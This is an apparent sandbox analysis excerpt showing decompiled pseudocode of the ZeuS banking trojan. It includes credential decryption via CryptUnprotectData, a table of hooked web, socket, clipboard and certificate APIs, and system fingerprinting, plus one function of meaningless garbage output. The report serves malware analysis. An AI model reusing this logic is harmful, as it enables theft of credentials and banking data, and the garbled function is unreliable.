										_v16 = E004055A2(_v52);
										LocalFree(_v52);
									}
								}
								E004051E6(_v44);
							}
						}
					}
					_t66 = 0x4b;
					E0040F34A(_t66,  &_v196);
					_t117 =  &_v72;
					_t68 = 0x54;
					E0040F34A(_t68, _t117);
					_t70 = 0x4030e8;
					_t109 =  ==  ? 0x4030e8 : _v16;
					_t97 =  ==  ? 0x4030e8 : _v36;
					_t135 = _v32;
					if(_v32 != 0) {
						_t70 = _t117;
					}
					_push(_t109);
					_push(_t97);
					_push(_t70);
					_push(_v20);
					E00405F67(_a12, E00405D35( *_a12),  *_a12, _t135,  &_v196, _a4);
					_t56 = E004051E6(_v16);
				}
				E0040B780(E0040B780(E0040B780(E0040B780(E0040B780(_t56, _v20), _v24), _v28), _v36), _v12);
				return _v5;
			}

APIs
  • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000000,?), ref: 004131A2
  • LocalFree.KERNEL32(?,?,?,?), ref: 004131BE
    • Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Free$CryptDataHeapLocalUnprotect
  • String ID:
  • API String ID: 2231100991-0
  • Opcode ID: 23284d3b6dd1d09cbdc4bc9a1756c292a2031c46c05ce055b0cdae9f6deb1245
  • Instruction ID: 2bb16e14e0ebea8dc4c48697bd6f958f0574d658446bd80e6efa9956895ba0c8
  • Opcode Fuzzy Hash: 23284d3b6dd1d09cbdc4bc9a1756c292a2031c46c05ce055b0cdae9f6deb1245
  • Instruction Fuzzy Hash: 43517E71E00219BADF10AFE5CC469EEBB75EF48315F10443AF614F7291D6389E858B58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 61%
			E0041C007(char* __esi) {
				void* _v40;
				short _v46;
				signed char _v48;
				struct _OSVERSIONINFOW _v324;
				void* _t13;
				int _t16;
				signed int _t20;
				short _t24;
				char* _t25;

				_t25 = __esi;
				E00405299(_t13, __esi, 0, 6);
				_v324.dwOSVersionInfoSize = 0x11c;
				_t16 = GetVersionExW( &_v324);
				if(_t16 != 0) {
					__imp__GetNativeSystemInfo( &_v40);
					 *__esi = E0041BF31();
					if(_v48 > 0xff || _v46 != 0) {
						_t20 = 0;
					} else {
						_t20 = _v48 & 0x000000ff;
					}
					 *(_t25 + 1) = _t20;
					asm("sbb eax, eax");
					 *((short*)(_t25 + 2)) =  !0xffff & _v324.dwBuildNumber;
					_t24 = _v40;
					 *((short*)(_t25 + 4)) = _t24;
					return _t24;
				}
				return _t16;
			}

APIs
  • GetVersionExW.KERNEL32(?,?,00000000,00000006), ref: 0041C02B
  • GetNativeSystemInfo.KERNEL32(?), ref: 0041C039
    • Part of subcall function 0041BF31: GetVersionExW.KERNEL32(?,74B04EE0), ref: 0041BF50
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Version$InfoNativeSystem
  • String ID:
  • API String ID: 2518960133-0
  • Opcode ID: cb25316e244f3879dbc0b467220055ee2758aadc6ad11637998de5dd51a3378e
  • Instruction ID: 6de3f85ac85499b8b4968ab66376158d07fdbc5b1c588c5b3caa2bcaf055519f
  • Opcode Fuzzy Hash: cb25316e244f3879dbc0b467220055ee2758aadc6ad11637998de5dd51a3378e
  • Instruction Fuzzy Hash: 5A0162349402498ADB31DFA5CD417EEB7F4AF09700F0080AAE168F3691E779DA84CB69
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 81%
			E00412E07() {
				void* _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _v28;
				void* _v32;
				char _v44;
				char _v56;
				char _v68;
				char _v132;
				void* _v388;
				void* _v644;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t60;
				intOrPtr* _t69;
				intOrPtr* _t71;
				signed int _t72;
				intOrPtr* _t73;
				intOrPtr* _t75;
				signed int _t76;
				intOrPtr* _t80;
				signed int _t81;
				void* _t85;
				void* _t87;
				void* _t91;
				void* _t94;
				void* _t100;
				void* _t106;
				intOrPtr* _t112;
				signed int _t114;
				intOrPtr _t122;
				void* _t123;
				void* _t130;
				void* _t132;
				intOrPtr* _t133;
				intOrPtr* _t136;
				void* _t141;

				_t60 =  &_v32;
				_t114 = 0;
				_v32 = 0;
				__imp__CoCreateInstance(0x4049e8, 0, 0x4401, 0x4049f8, _t60);
				if(_t60 != 0) {
					L3:
					_v20 = _t114;
					_t133 = _t114;
					L4:
					if(_t133 == _t114) {
						return _t60;
					}
					_push(1);
					_push(_t114);
					_push(_t133);
					_v12 = _t114;
					if( *((intOrPtr*)( *_t133 + 0x40))() != 0) {
						L33:
						 *((intOrPtr*)( *_t133 + 8))(_t133);
						_push(0xcc);
						return E0041293E(_t126, _v12, 0x3e);
					}
					_push( &_v28);
					_push(0xe);
					_push(_t133);
					if( *((intOrPtr*)( *_t133 + 0x14))() != 0) {
						goto L33;
					}
					while(1) {
						_t69 = _v28;
						_t126 =  &_v8;
						_push( &_v8);
						_push(_t69);
						if( *((intOrPtr*)( *_t69 + 0x14))() != 0) {
							break;
						}
						_t71 = _v8;
						_t72 =  *((intOrPtr*)( *_t71 + 0x38))(_t71,  &_v16);
						__eflags = _t72;
						if(_t72 == 0) {
							__eflags = _v16 - _t114;
							if(_v16 != _t114) {
								_t75 = _v8;
								_t76 =  *((intOrPtr*)( *_t75 + 0x14))(_t75, 0x123503f0,  &_v388, 0x100);
								__eflags = _t76;
								if(_t76 == 0) {
									__eflags =  &_v388 | 0xffffffff;
									_v24 = E00405426( &_v388 | 0xffffffff, _t114,  &_v388);
								} else {
									_v24 = _t114;
								}
								_t80 = _v8;
								_t81 =  *((intOrPtr*)( *_t80 + 0x14))(_t80, 0x143203f0,  &_v644, 0x100);
								__eflags = _t81;
								if(_t81 == 0) {
									__eflags =  &_v644 | 0xffffffff;
									_t132 = E00405426( &_v644 | 0xffffffff, _t114,  &_v644);
								} else {
									_t132 = 0;
								}
								_t85 = 0x4a;
								E0040F34A(_t85,  &_v132);
								_t87 = 0x4030e8;
								_t130 = 0x4030e8;
								__eflags = _t132 - _t114;
								if(_t132 != _t114) {
									_t130 = _t132;
								}
								_t122 = _v24;
								_t136 = _v12;
								__eflags = _t122 - _t114;
								_t123 =  ==  ? _t87 : _t122;
								__eflags = _t136 - _t114;
								if(_t136 != _t114) {
									__eflags =  *_t136 - _t114;
									if( *_t136 != _t114) {
										_t87 = 0x404a58;
									}
								}
								_push(_t130);
								_push(_t123);
								_t91 = E00405F67( &_v12, E00405D35(_t136), _t136, __eflags,  &_v132, _t87);
								_t141 = _t141 + 0x10;
								E004051E6(_v24);
								E004051E6(_t132);
								__eflags = _t91 - 0xffffffff;
								if(_t91 == 0xffffffff) {
									_t30 =  &_v16;
									 *_t30 = _v16 & 0x00000000;
									__eflags =  *_t30;
								}
								__eflags = _v16 & 0x00000002;
								if((_v16 & 0x00000002) != 0) {
									_t106 = 0x53;
									E0040F34A(_t106,  &_v68);
									E00412CC7(_v8,  &_v68, 0x129803f0, 0x129d03e9, 0x129e03f5, 0x129903f0, 0x129a03f6,  &_v12);
								}
								__eflags = _v16 & 0x00000004;
								if((_v16 & 0x00000004) != 0) {
									_t100 = 0x52;
									E0040F34A(_t100,  &_v56);
									E00412CC7(_v8,  &_v56, 0x13c403f0, 0x13c903e9, 0x13ca03f5, 0x13c503f0, 0x13c603f6,  &_v12);
								}
								__eflags = _v16 & 0x00000008;
								if((_v16 & 0x00000008) != 0) {
									_t94 = 0x51;
									E0040F34A(_t94,  &_v44);
									E00412CC7(_v8,  &_v44, 0x142803f0, 0x142d03e9, 0x142e03f5, 0x142903f0, 0x142a03f6,  &_v12);
								}
								_t133 = _v20;
								_t114 = 0;
								__eflags = 0;
							}
						}
						_t73 = _v8;
						 *((intOrPtr*)( *_t73 + 8))(_t73);
					}
					_t112 = _v28;
					 *((intOrPtr*)( *_t112 + 8))(_t112);
					goto L33;
				}
				_t133 = _v32;
				if(_t133 == 0) {
					goto L3;
				} else {
					_v20 = _t133;
					goto L4;
				}
			}

APIs
  • CoCreateInstance.OLE32(004049E8,00000000,00004401,004049F8,?), ref: 00412E2C
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CreateInstance
  • String ID:
  • API String ID: 542301482-0
  • Opcode ID: ae9fa143f870d5f5ebd0b3cc597910b4e445582b321c896fc1a5cb8e1a1fe386
  • Instruction ID: 4df3c33cc355487fe9d05d54643e6b5bd56fdbce11269c23f09cbfaa804a2a53
  • Opcode Fuzzy Hash: ae9fa143f870d5f5ebd0b3cc597910b4e445582b321c896fc1a5cb8e1a1fe386
  • Instruction Fuzzy Hash: 4C617F71A40219AFDB10DEA4CD84EEFBBB8EF44314F14416AFA11F7281DB789E858B54
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00405310() {
				long _t7;
				signed int _t8;
				intOrPtr _t9;
				void* _t11;
				void* _t13;

				_t11 = _t13 - 0x78;
				_t7 = GetTimeZoneInformation(_t11 - 0x34);
				if(_t7 != 1) {
					if(_t7 != 2) {
						_t8 = 0;
					} else {
						_t9 =  *((intOrPtr*)(_t11 + 0x74));
						goto L4;
					}
				} else {
					_t9 =  *((intOrPtr*)(_t11 + 0x20));
					L4:
					_t8 = (_t9 +  *(_t11 - 0x34)) * 0xffffffc4;
				}
				return _t8;
			}

Instruction addresses (per-line address column, collapsed): 0x00405311 to 0x00405345

APIs
  • GetTimeZoneInformation.KERNEL32(?), ref: 0040531F
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: InformationTimeZone
  • String ID:
  • API String ID: 565725191-0
  • Opcode ID: fe6ac59ab315fcc37406d5ed7048e2630762bdcfda85e537b1a721fe11d8d0d5
  • Instruction ID: 74f24d085fb398a505755f3efd6941e3f0022904ac23cfda6013bf0edc79f04e
  • Opcode Fuzzy Hash: fe6ac59ab315fcc37406d5ed7048e2630762bdcfda85e537b1a721fe11d8d0d5
  • Instruction Fuzzy Hash: 6FE08631904408CBDB20EBE4EE8199E77F9E711344F700422E842F6180D27CDA468E06
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%
			E004016C3(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi, void* __fp0) {
				intOrPtr* _t95;
				void* _t96;
				void* _t98;
				intOrPtr* _t100;
				void* _t102;
				intOrPtr* _t104;
				signed char _t111;
				signed char _t112;
				signed char _t113;
				signed char _t114;
				signed char _t127;
				signed char _t128;
				signed char _t132;
				signed char _t133;
				void* _t165;
				void* _t168;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				intOrPtr* _t172;
				intOrPtr* _t187;
				intOrPtr* _t188;
				void* _t189;
				intOrPtr* _t191;
				signed char _t195;
				intOrPtr* _t205;
				signed char _t213;
				signed char _t217;
				intOrPtr* _t224;
				intOrPtr* _t225;
				void* _t226;
				intOrPtr* _t229;
				void* _t230;
				intOrPtr* _t232;
				intOrPtr* _t233;
				void* _t236;
				intOrPtr* _t237;
				void* _t239;
				void* _t241;
				void* _t242;
				void* _t243;
				void* _t245;
				void* _t246;
				void* _t249;
				void* _t251;
				void* _t252;
				void* _t253;
				void* _t254;

				_t232 = __esi;
				_t168 = __ebx;
				_t205 = __edx + __ecx;
				 *__eax =  *__eax + __ebx;
				_t253 = _t252 + __ecx;
				 *_t205 =  *_t205 + __ebx;
				 *__esi =  *__esi + __ecx;
				_t95 = __eax + _t205;
				 *_t95 =  *_t95 + _t205;
				 *((intOrPtr*)(__ebx + 1)) =  *((intOrPtr*)(__ebx + 1)) + _t95;
				asm("rol byte [ecx], cl");
				_t224 = __edi + __ecx + 1;
				_t242 = _t241 + _t205;
				 *((intOrPtr*)(_t95 + 1)) =  *((intOrPtr*)(_t95 + 1)) + _t205;
				_pop(_t96);
				_t187 = __ecx + _t205 + __ebx;
				_t5 = __esi + 1;
				 *_t5 =  *((intOrPtr*)(__esi + 1)) + _t242;
				asm("fild dword [ecx]");
				if( *_t5 >= 0) {
					asm("fiadd word [ecx]");
				}
				 *((intOrPtr*)(_t205 + 1)) =  *((intOrPtr*)(_t205 + 1)) + _t253;
				asm("loopne 0x3");
				_push(_t242);
				_t169 = _t168 + _t253;
				 *_t169 =  *_t169 + _t96;
				_t243 = _t242 + _t253;
				 *_t205 =  *_t205 + _t224;
				_t233 = _t232 + _t253;
				 *_t224 =  *_t224 + _t96;
				 *0x1901ea01 =  *0x1901ea01 + _t187;
				_t254 = _t253 + _t243;
				 *_t169 =  *_t169 + _t169;
				_t225 = _t224 + _t243;
				 *_t225 =  *_t225 + _t187;
				_t98 = _t96 + _t243 + _t233;
				 *_t187 =  *_t187 + _t205;
				_t188 = _t187 + _t233;
				 *((intOrPtr*)(_t188 + _t98 - 0xe)) =  *((intOrPtr*)(_t188 + _t98 - 0xe)) + _t98;
				 *((intOrPtr*)(_t98 + 1)) =  *((intOrPtr*)(_t98 + 1)) + _t188;
				asm("cmc");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t205;
				asm("clc");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t169;
				asm("stc");
				 *((intOrPtr*)(_t225 + 1)) =  *((intOrPtr*)(_t225 + 1)) + _t243;
				asm("sti");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t233;
				 *_t188 =  *_t188 + 1;
				asm("arpl [ecx], ax");
				 *_t188 =  *_t188 + 1;
				_t100 =  *0xa6012602 +  *((intOrPtr*)(_t188 +  *0xa6012602));
				_t170 = _t169 +  *_t233;
				 *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) =  *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) + _t243;
				asm("daa");
				 *((intOrPtr*)(_t233 - 0x46fedafe)) =  *((intOrPtr*)(_t233 - 0x46fedafe)) + _t233;
				 *((intOrPtr*)(_t170 - 0x43fee0fe)) =  *((intOrPtr*)(_t170 - 0x43fee0fe)) + _t225;
				_t189 = _t188 +  *_t100;
				_t102 = _t100 +  *_t100 + _t170;
				_t171 = _t170 +  *((intOrPtr*)(_t189 + _t102));
				asm("insb");
				_t172 = _t171 +  *((intOrPtr*)(_t189 + _t102 - 0x1b));
				_t236 = _t233 + _t100 + _t171 + _t254;
				_t191 = _t189 +  *_t172 +  *((intOrPtr*)(_t189 +  *_t172));
				_t245 = _t243 + _t205 +  *_t188 +  *0xa02c501 + _t236;
				_t104 = _t102 +  *_t191 + _t225;
				_t237 = _t236 + _t225;
				 *0xa3013803 = _t104;
				asm("movsd");
				_t246 = _t245 +  *_t104;
				 *((intOrPtr*)(_t237 - 0x55fec4fd)) =  *((intOrPtr*)(_t237 - 0x55fec4fd)) + _t254;
				 *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) =  *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) + _t246;
				_push(_t225);
				 *((intOrPtr*)(_t246 - 0x49fed6fd)) =  *((intOrPtr*)(_t246 - 0x49fed6fd)) + _t237;
				_t226 = _t225 +  *((intOrPtr*)(_t191 + _t104));
				 *((intOrPtr*)(3 + _t104 + 0x3bd0167)) =  *((intOrPtr*)(3 + _t104 + 0x3bd0167)) + _t226;
				 *((intOrPtr*)(_t226 - 0x3ffeb4fd)) =  *((intOrPtr*)(_t226 - 0x3ffeb4fd)) + _t226;
				asm("rol byte [ebx], cl");
				_t239 = _t237 +  *_t237 +  *0xFFFFFFFFBB011304;
				_push(0x6a03de01);
				_t229 = _t226 + _t104 +  *_t104 + _t191 + _t254 +  *((intOrPtr*)(_t237 + 1)) +  *3 + _t191 - 1;
				_t249 = _t246 +  *_t237 +  *0xbb011303 +  *_t229;
				_t213 = 0xffffffffbb011302 +  *_t237 +  *_t229;
				_t230 = _t229 + _t249;
				asm("repne add ecx, [ebp+0x1]");
				asm("repe add esi, [edi]");
				_t195 = _t191 + 0xffffffff76022609 + _t239 + _t230;
				asm("std");
				_t251 = _t249 +  *((intOrPtr*)(0xffffffffbb011306)) +  *((intOrPtr*)(_t195 + 1));
				 *((char*)(0xffffffffbb011306)) =  *((char*)(0xffffffffbb011306)) + 1;
				_t111 = 0x3e +  *_t195 * 0x7e;
				 *(_t195 - 0x5dcffdfc) =  *(_t195 - 0x5dcffdfc) & _t111;
				_t112 = _t111 + 0xc;
				 *0xFFFFFFFF5F31200A =  *0xFFFFFFFF5F31200A ^ _t112;
				_t113 = _t112 + 1;
				 *(_t251 - 0x59cf04fc) =  *(_t251 - 0x59cf04fc) ^ _t113;
				_t114 = _t113 + 0xf2;
				 *(_t230 - 0x57cf5efc) =  *(_t230 - 0x57cf5efc) ^ _t114;
				 *(_t195 - 0x55cf5afc) =  *(_t195 - 0x55cf5afc) ^ _t195;
				 *0xFFFFFFFF6731BC0A =  *0xFFFFFFFF6731BC0A ^ _t195;
				 *(_t251 - 0x51cf1afc) =  *(_t251 - 0x51cf1afc) ^ _t195;
				 *(_t230 - 0x4fcf3cfc) =  *(_t230 - 0x4fcf3cfc) ^ _t195;
				 *(_t195 - 0x4dcf5dfc) =  *(_t195 - 0x4dcf5dfc) ^ _t213;
				 *0xFFFFFFFF6F31B90A =  *0xFFFFFFFF6F31B90A ^ _t213;
				 *(_t251 - 0x49cf55fc) =  *(_t251 - 0x49cf55fc) ^ _t213;
				 *(_t230 - 0x47cf52fc) =  *(_t230 - 0x47cf52fc) ^ _t213;
				 *(_t195 - 0x45cf4efc) =  *(_t195 - 0x45cf4efc) ^ 0xffffffffbb011306;
				 *0xFFFFFFFF7731C80A =  *0xFFFFFFFF7731C80A ^ 0xffffffffbb011306;
				 *(_t251 - 0x41cf46fc) =  *(_t251 - 0x41cf46fc) ^ 0xffffffffbb011306;
				 *(_t230 - 0x3fcf42fc) =  *(_t230 - 0x3fcf42fc) ^ 0xffffffffbb011306;
				_t127 = _t114 + 0x99a;
				_t128 = _t127 + 0xc1;
				_t132 = (_t128 + 0x18a ^ _t128 + 0x18a) + 0xc8;
				_t133 = _t132 + 0xca;
				_t217 = _t213 ^ _t128 ^ _t133 ^ 0;
				_t165 = ((((((_t133 + 0x197 ^ _t195 ^ _t127 ^ _t132) + 0x33c ^ 0) + 0x366 ^ _t217) + 0x382 ^ 0) + 0x39b ^ 0x00000003) + 0x3ae ^ 0) + 0x319;
				 *(_t251 + _t165 + 0x5bb060c) =  *(_t251 + _t165 + 0x5bb060c) ^ 0 ^ _t217 ^ 3;
				asm("sbb eax, [esi]");
				return _t165 + 0x05c20621 &  *(_t239 +  *0xFFFFFFFFBB011307);
			}

Instruction addresses (per-line address column, collapsed): 0x004016c3 to 0x0040192c

Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID:
  • String ID:
  • API String ID:
  • Opcode ID: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
  • Instruction ID: 31e33c21b8c06eece4b1486e38d46e44d688eb9565853b67097823216a1ce6c3
  • Opcode Fuzzy Hash: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
  • Instruction Fuzzy Hash: 9781A3319893918BC795DF38C8D55D6BBB1EE4322432D85DDC8940EA03E22F651BDF51
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 98%
			E00407F39(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				unsigned int _t67;
				signed int _t68;
				intOrPtr _t71;
				void* _t79;
				signed int _t81;
				intOrPtr _t87;
				intOrPtr _t88;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				unsigned int _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				signed int _t115;
				signed int _t116;
				intOrPtr* _t119;
				unsigned int _t125;
				signed int _t126;
				signed int _t128;

				_t71 = _a4;
				_t98 = 0;
				_t99 = 0;
				_v16 = 0;
				_v20 = 1;
				L1:
				while(1) {
					if(_t99 == 0) {
						_t103 =  *(_t98 + _t71);
						_t98 = _t98 + 4;
						_t99 = 0x1f;
						_t104 = _t103 >> 0x1f;
					} else {
						_t99 = _t99 - 1;
						_t104 = _t67 >> _t99 & 0x00000001;
					}
					if(_t104 != 0) {
						_v16 = _v16 + 1;
						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
						_t98 = _t98 + 1;
						L6:
						_t71 = _a4;
						continue;
					}
					_v12 = 1;
					do {
						if(_t99 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t100 = 0x1f;
							_t106 = _t67 >> 0x1f;
						} else {
							_t100 = _t99 - 1;
							_t106 = _t67 >> _t100 & 0x00000001;
						}
						_v12 = _t106 + _v12 * 2;
						if(_t100 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t108 = _t67 >> 0x1f;
						} else {
							_t99 = _t100 - 1;
							_t108 = _t67 >> _t99 & 0x00000001;
						}
					} while (_t108 == 0);
					_t111 = _v12;
					if(_t111 == 2) {
						_t81 = _v20;
						L19:
						_v12 = _t81;
						if(_t99 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t101 = 0x1f;
							_v8 = _t67 >> 0x1f;
						} else {
							_t101 = _t99 - 1;
							_v8 = _t67 >> _t101 & 0x00000001;
						}
						if(_t101 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t115 = _t67 >> 0x1f;
						} else {
							_t99 = _t101 - 1;
							_t115 = _t67 >> _t99 & 0x00000001;
						}
						_t116 = _t115 + _v8 * 2;
						_v8 = _t116;
						if(_t116 == 0) {
							_v8 = 1;
							do {
								if(_t99 == 0) {
									_t125 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t102 = 0x1f;
									_t126 = _t125 >> 0x1f;
								} else {
									_t102 = _t99 - 1;
									_t126 = _t67 >> _t102 & 0x00000001;
								}
								_v8 = _t126 + _v8 * 2;
								if(_t102 == 0) {
									_t67 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t99 = 0x1f;
									_t128 = _t67 >> 0x1f;
								} else {
									_t99 = _t102 - 1;
									_t128 = _t67 >> _t99 & 0x00000001;
								}
							} while (_t128 == 0);
							_v8 = _v8 + 2;
						}
						asm("sbb ecx, ecx");
						_v8 = _v8 +  ~0xd00;
						_t87 = _v16;
						_t119 = _t87 - _v12 + _a12;
						_v16 = _t119;
						 *((char*)(_t87 + _a12)) =  *_t119;
						_t88 = _t87 + 1;
						_v16 = _v16 + 1;
						do {
							 *((char*)(_t88 + _a12)) =  *_v16;
							_t88 = _t88 + 1;
							_v16 = _v16 + 1;
							_t57 =  &_v8;
							 *_t57 = _v8 - 1;
						} while ( *_t57 != 0);
						_v16 = _t88;
						goto L6;
					}
					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
					_t98 = _t98 + 1;
					if(_t79 != 0xffffffff) {
						_t81 = _t79 + 1;
						_v20 = _t81;
						goto L19;
					}
					_t68 = _a16;
					 *_t68 = _v16;
					return _t68 & 0xffffff00 | _t98 == _a8;
				}
			}

Instruction addresses (per-line address column, collapsed): 0x00407f40 to 0x00408100

Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID:
  • String ID:
  • API String ID:
  • Opcode ID: 4f4b364eb5e01cb4963202215bd9b16e8fc03a0e04bf887195a9ff215a63561e
  • Instruction ID: e38a62657d7716bb4eb7a316e5472edfd9f62e27910cbc1015e22cc4e6187ee9
  • Opcode Fuzzy Hash: 4f4b364eb5e01cb4963202215bd9b16e8fc03a0e04bf887195a9ff215a63561e
  • Instruction Fuzzy Hash: A951D132E04A269BDB148E58C4506ADF7B1EF85324F1A42BEDD46BF3C5CA74AD41DB80
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 66%
			E0040E072() {
				void* __ebx;
				intOrPtr _t1;
				signed int _t55;
				void* _t57;
				void* _t58;

				_t1 =  *0x4239d4;
				if(_t1 == 0) {
					_t1 =  *0x4239d0;
					 *0x42200c = E00418985;
				} else {
					 *0x42200c = E00418A3C;
				}
				 *0x422008 = _t1;
				 *0x422018 =  *0x4239e0;
				 *0x422028 = GetFileAttributesExW;
				 *0x422038 = HttpSendRequestW;
				 *0x422048 = HttpSendRequestA;
				 *0x422058 = HttpSendRequestExW;
				 *0x422068 = HttpSendRequestExA;
				 *0x422078 = InternetCloseHandle;
				 *0x422088 = InternetReadFile;
				 *0x422098 = __imp__InternetReadFileExA;
				 *0x4220a8 = InternetQueryDataAvailable;
				 *0x4220b8 = HttpQueryInfoA;
				 *0x4220c8 = __imp__#3;
				 *0x4220d8 = __imp__#19;
				 *0x4220e8 = __imp__WSASend;
				 *0x4220f8 = OpenInputDesktop;
				 *0x422108 = SwitchDesktop;
				 *0x422118 = DefWindowProcW;
				 *0x422128 = DefWindowProcA;
				 *0x422138 = DefDlgProcW;
				 *0x422148 = DefDlgProcA;
				 *0x422158 = DefFrameProcW;
				 *0x422168 = DefFrameProcA;
				 *0x422178 = DefMDIChildProcW;
				 *0x422188 = DefMDIChildProcA;
				 *0x422198 = CallWindowProcW;
				 *0x4221a8 = CallWindowProcA;
				 *0x4221b8 = RegisterClassW;
				 *0x4221c8 = RegisterClassA;
				 *0x4221d8 = RegisterClassExW;
				 *0x4221e8 = RegisterClassExA;
				 *0x4221f8 = BeginPaint;
				 *0x422208 = EndPaint;
				 *0x422218 = GetDCEx;
				 *0x422228 = GetDC;
				 *0x422238 = GetWindowDC;
				 *0x422248 = ReleaseDC;
				 *0x422258 = GetUpdateRect;
				 *0x422268 = GetUpdateRgn;
				 *0x422278 = GetMessagePos;
				 *0x422288 = GetCursorPos;
				 *0x422298 = SetCursorPos;
				 *0x4222a8 = SetCapture;
				 *0x4222b8 = ReleaseCapture;
				 *0x4222c8 = GetCapture;
				 *0x4222d8 = GetMessageW;
				 *0x4222e8 = GetMessageA;
				 *0x4222f8 = PeekMessageW;
				 *0x422308 = PeekMessageA;
				 *0x422318 = TranslateMessage;
				_push(0x422008);
				 *0x422328 = GetClipboardData;
				_t55 = 0x34;
				 *0x422338 = __imp__PFXImportCertStore;
				return E0040DFE1(_t55, _t57, _t58);
			}

Instruction addresses (per-line address column, collapsed): 0x0040e072 to 0x0040e2a8

Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: AllocVirtual
  • String ID:
  • API String ID: 4275171209-0
  • Opcode ID: 5440b081e5c14d004d77e6db19f0da771aa4d30ea54d1c0c1fc6eae15c025d27
